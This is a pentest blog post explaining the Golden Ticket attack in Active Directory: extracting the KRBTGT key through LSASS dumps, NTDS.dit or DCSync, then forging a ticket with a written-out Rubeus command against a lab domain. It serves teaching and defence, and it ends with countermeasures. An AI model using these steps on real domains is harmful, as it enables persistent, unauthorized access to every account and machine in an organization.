Tickets Kerberos
Celia Catalán
Today we are going to talk about one of the different techniques that we usually carry out on internal pentest
Once an attacker manages to compromise a domain after achieving high privileges, such as Domain Admin or Enterprise Admin, it is very difficult for an organization to regain full control of the forest and consider it 100% clean.
Attackers with this access can use their high privileges to extract special credentials from the domain and use them to gain persistence, being able to regain access as any user at any time. These credentials are rarely or never modified, giving attackers virtually unlimited access.
Throughout different publications, we are going to see some of these persistence techniques, which are based on the use of Kerberos tickets.
GOLDEN TICKET
A Golden Ticket attack involves the creation of a legitimate Ticket Granting Ticket (TGT) that impersonates any user by using the NTLM hash of the Active Directory account KRBTGT. This technique is particularly powerful, as it allows access to any service or machine within the domain as the impersonated user. It is essential to remember that KRBTGT account credentials are never automatically updated.
To acquire the NTLM hash of the KRBTGT account, several methods can be used:
- It can be extracted from memory by dumping the LSASS (Local Security Authority Subsystem Service) process of a Domain Controller.
- It can also be extracted from the NT Directory Services file (NTDS.dit) located on any Domain Controller.
- Or it can be obtained after running a DCsync attack, which can be done using tools like Mimikatz or Impacket's secretsdump.py script.
It is important to mention that, to perform these operations, Domain Admin privileges or a similar level of access (auth/system) are normally required. For this reason, Golden Tickets are used to make lateral movements throughout the rest of the domain, as well as establish persistence and not for privilege escalation.
As in the case of Silver Ticket, although NTLM hashing serves as a viable method for this purpose, it is recommended to execute this attack using Kerberos AES (Advanced Encryption Standard) keys for operational security reasons and to be less detectable. .
Impact
A Golden Ticket allows unlimited and persistent access to any resource within the domain until the KRBTGT key is changed, which can be a complex and disruptive process.
Explotation
For this scenario, we start from a compromised domain, where we have Domain Admin credentials and we have managed to perform the DCSync technique, thus obtaining the Kerberos keys of the KRBTGT account.
Ticket creation
To create the Golden Ticket, we can use the Rubeus tool and execute the following command:
Rubeus.exe golden /aes256: 42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /user:Eddard.stark /domain:north.sevenkingdoms.local /sid:S-1-5-21-1430251130-2586379517-4083755373 /nowrap
- Aes256: Aes256 key of the previously extracted KRBTGT account
- User: User to be impersonalized, in this case a Domain Admin
- Domain: Domain name
- Sid: SID of the domain
Import the ticket
- Program: Command to execute where the ticket will be injected
- Domain: Domain name
- Username: Domain user
- Password: User password. It is not necessary to know the user's real password
- Ticket: The ticket created previously
| Feature | Golden Ticket |
|---|---|
| Aim | Access to the entire domain |
| Required Credentials | Domain administrator or KRBTGT |
| Impact | Unlimited domain access |
| Complexity of the attack | high |
| Key Countermeasures | KRBTGT protection, comprehensive monitoring |
